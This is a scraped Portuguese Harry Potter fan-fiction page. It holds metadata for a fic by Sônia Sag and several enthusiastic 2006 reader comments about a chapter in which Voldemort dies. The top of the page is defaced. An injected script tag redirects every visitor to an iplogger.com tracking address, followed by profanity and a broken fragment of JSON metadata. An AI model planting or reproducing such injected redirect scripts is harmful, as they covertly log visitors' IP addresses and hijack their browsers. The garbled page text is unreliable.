<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
sônia VC TÁ DE BRINCADEIRA NÉ?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! esperamos tanto tempo por sua fic numa agonia e vc deixa assim????? ainda tem jeito? please!!!!!!!! posso ter esperança???? e não, não quero esperar outra fic pra ter um happy end!!!!! tó parecendo criança né?! rsrsrs... mas é que realmente estou decpcionada.. esperava mas sabe....(* cara de extremmente triste).... então tá.... bjos
2006-06-03Olá Nossa vc q nos mata, ou coisa do tipo? A sua fic está ótima, cada vez q leio + 1 pagina fico mais curiosa! Ve se vc termina logo a nossa agonia!!!!
2006-06-03Querida, ficou lindo, até que valeu esperar, amei os quadros dos xeretas caindo, e eu já desconfiava da capa de invisibilidade, muito bom, e quanto ao que vc fez com Harry, desde o começo que eu penso assim tambem, ele só vai vencer tornando-se um igual, porque o mal é muito grande, e agora eu fico como todos esperando o final.............. Antonieta
2006-06-03Parabens Sônia, como a gente converso no msn, ta muito bom mesmo. E parabéns denovo, por ter conseguido o primeiro lugar nas fics mais votadas. A gente conversa mais depois. Bjo.
2006-06-03*Respirando devagar,tentando chamar todas as emoções de volta* Primeiro de tudo: OO..que capítulo foi esse? Nooosssa,estou estupefata! Mas calma,vamos por partes. 1-O díalogo inicial estava perfeito,o Voldemort como sempre desdenhoso e o Harry com uma calma que eu não esperava,realmente dois generais avaliando o inimigo. 2- É impressão minha o o Voldie tava meio deseperado em fazer a troca? oO ainda bem que o harry não cedeu! 3- Eu juro que eu não saquei o que a Nagini tinha percebido,mas tbm eu não estava ( e ainda não estou) conseguido formular qualquer pensamento muiito coerente. 4- O Cara de Cobra realmente apelou ao falar que podia trazer o Sirius de volta,por um minuto eu achei que o Harry fosse ceder 5- "Rony, livrando-se da capa de invisibilidade, acabou de decepar a cabeça partida de Nagini e atirou-a aos pés de Voldemort, que olhou chocado para baixo, ao mesmo tempo em que Ron atirava a espada para o amigo." Daaale Ron! Quase gritei nessa hora! A cobrinha chata foi pro espaço uhuuuul! *Carol,meio sam noção* 6-Quando o Voldie jogou o Harry e o Ron longe sem a varinha e ainda pegou a Gina e a Mione,eu fiquei com MUITO medo,mesmo. 7- "- Poderoso?... Não vi tanto poder assim...Vi um sujeito rejeitado pelo pai... Que tinha que comprar a companhia dos colegas e asseclas, cercando-se de interesseiros e imbecis !... Cuja mãe preferiu morrer a conviver com a própria cria...Até sua concepção aconteceu de uma enganação, Tom..." Se o Harry queria provocar a ira do Voldemort,com essa fala ele realmente conseguiu OO pegou pesado mechendo com o passado do Riddle (se o Harry chama assim eu tb posso) quase que pude prever o que viria a seguir *medo* 8- Caraca,muito angustiante,ver tudo aquilo que o Voldemort passou pro Harry,horrível..suas descrições como sempre perfeitas..quase que pude sentir o que o Harry sentiu. 9- mérlindocéu! Harry daquele jeito todo malígno deu muiito medo,fiquei até arrepiada OO *medo,muito medo* 10- Que duelo foi aquele Sônia? OO..dava pra sentir o poder dos dois oponentes..um duelo digno de arena. *impressionada* 11- Essa hora eu juro que suei frio,Rony om maldição de um lado Herminone com maldição do outro e Gina com a Espada cravada na barriga! Isso que é trabalho em grupo! OO 12- "...enquanto o pescoço deslizava suavemente para longe dos ombros, a cabeça separando-se do corpo. Enquanto a primeira rolava pelo chão, o segundo desabou devagar, caindo de frente aos pés do resfolegante, taciturno e vitorioso Harry." SIM! o Cara de Cobra se foooooi! *pulinhos e socos no ar* uhuuuuuul, da melhor forma possível! a morte dele,foi geeeeenial. 13- "Gina livrou-se do braço do irmão, ignorando sua advertência para que ficasse onde estava, e andou de gatinhas, arrastando a perna machucada, até achegar-se a Harry. Devagar, colocou a mão sobre o braço direito do rapaz, cheia de emoção e vontade de abraçá-lo pelo resto do ano para comemorar o fato de estarem vivos, orgulhosa pelo extraordinário bruxo que ele era, e chamou baixinho." Tive que colocar esse trecho tbm,eu estava como a Gina,crente que o Harry irei levantar e abraça-la e dizer que estava tudo bem..mas não! o que houve? ele continua com aquela maldade toda? o que ele foi fazer agora? aimeumérlin! Se vc queria nos deixar angustiados e ansiosos. Conseguiu! Estou temerosa pelo Harry,muita coisa..*roe unhas*. Nossa,Sônia vc realmente se superou dessa vez,alías a cada capítulo dessa maravilhosa fic,que me prendeu a cada linha..vc se superou e nos surpreendeu mais e mais! Vamos agradecer aos céus todos os dias por ese seu talento. Esse cáp me deixou com medo,ansiosa,estupefata,angustiada,feliz..uma mistura de emoções que só é possível com coisas realmente geniais..Eu imagino o quanto díficil esse cápítulo deve ter sido de escrever e tbm o medo de não agradar,mas nosssaa..agradou e muito,estou até agora maravilhada e sem palavras com o ele. Parabéns,mesmo! Esse comentário deve estar meio incoerente,mas eu tentei descrever tudo que eu sentio ao ler. e só digo uma coisa: Sônia Sag,vc é GENIAL. x))
2006-06-03Eu não estou acreditando!!!!Que capítulo!!!!Ele morreu!!!!!!!!Mas,o que foi aquilo no fim?Parabéns pelo maravilhoso[ e mt cruel]capitulo!!!!Atualiza!!!!
2006-06-03ei sonia,fic imprcável! mas..acabou?!!?!??!?!?!/?!?!?!?! maiores explicacoes só na proxima!?!?!?!??!!?!? e vem qnd!?!?!?!?!?!?!?!??!!? n entendi! pliiiiiiiiiis...posta um nota de esclarecimento!!!!bjoooos!
2006-06-03O q vc qr dizer ccom decepionados? Oq? Eu estou no minimo em furia!!! Como alguem faz isso? O q aconteceu com o meu Harry? Qm é esse monstro q vc coloco no lugar dele? Pq com certeza essa ñ é o Harry! O nosso Harry é gentil, fofo, um pouco estorado + ñ passa disso! + pelo menos o Voldie morreu! Agora falando serio! fico otimo o cap! To com vontade de mata o Harry + td bem! E por favor! NÂO DEMORA PRA POSTA O CAP 35!!! vc deixo a gnt com a maior anciedade no final desse capitulo então, pelo menos posta o outro logo!
2006-06-03Bem, vamos por partes: 1- Será que o Harry ficou maléfico mesmo? 2- Você vai nos deixar nessa agonia até quando? 3- Tadinha da Gina, da Mione e do Rony. Depois dizem que eu maltrato o Harry nas minhas fics... 4- Vc.vai dar um final infeliz à história??? 5- Voldie morreu mesmo? 6- Tirando todas essas dúvidas existenciais, não há como negar; O CAPÍTULO FOI DE TIRAR O FÔLEGO!!!! SENSACIONAL!!!!!!!!!!!!!!!! 7- Agora quero saber como isso vai terminar! Vai terminar, né? Bjus. 4-
2006-06-03devia ter nota 100 na floreios porque é o q essa fic merece. Sonia o que vc fez com o harry???????????????? mas eu te perdoo pelo simples fato de vc ter transformado o rony num gostosissimo ruivo maduro (ele é meu personagem preferido como deu pra notar). sempre percebi que vc é muito cuidadosa com os detalhes que estao nos livros originais. entao imagino que o que aconteceu com o harry tem a ver com o fato dele naum ter usadoo amor como arma. ele se permitiu conectra-se de tal forma a voldemort que a maldade do falecido (graças a merlin - bombas de bosta no ar) acabou por possuir-lhe. mas sei que no ultimo capitulo vc vai salva-lo afinal de contas é harry pottere le NAUM pode morrer, pleo menos naum na sua fic. (por favor, naum qiueira o nosso desprezo - hehehe). se bem que a unica coisa que me faria odiar essa fic seria vc matar o rony ou a mione. mas vc sensatamente nao o fez e NUAM VAI FAZER POR FAVOR! pelo que vc disse na comu vai ter mais um capitulo (o 35 por favor!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ) e um epilogo nao é ? espero ansiosa mas sem pressao como vc sempre pede. já tem alguma previsao? brincadeirinha. sei que vc naum gosta de ser pressionada mas seria reconfirtante p/ nós humildes fãs se vc de vez em qdo nos dissesse como vaum as coisas. só p/ nos acalmar. pode ser? valeu por antecipação. sabe, estou sentindo como se tivesse recebido o feitiço das pernas bambas e um silenciador. naum consigo andar e nem falar de emoçaõ. esperamos o proximo e muita muita FELIX FELICITIS PRA VC!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! BJUS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2006-06-03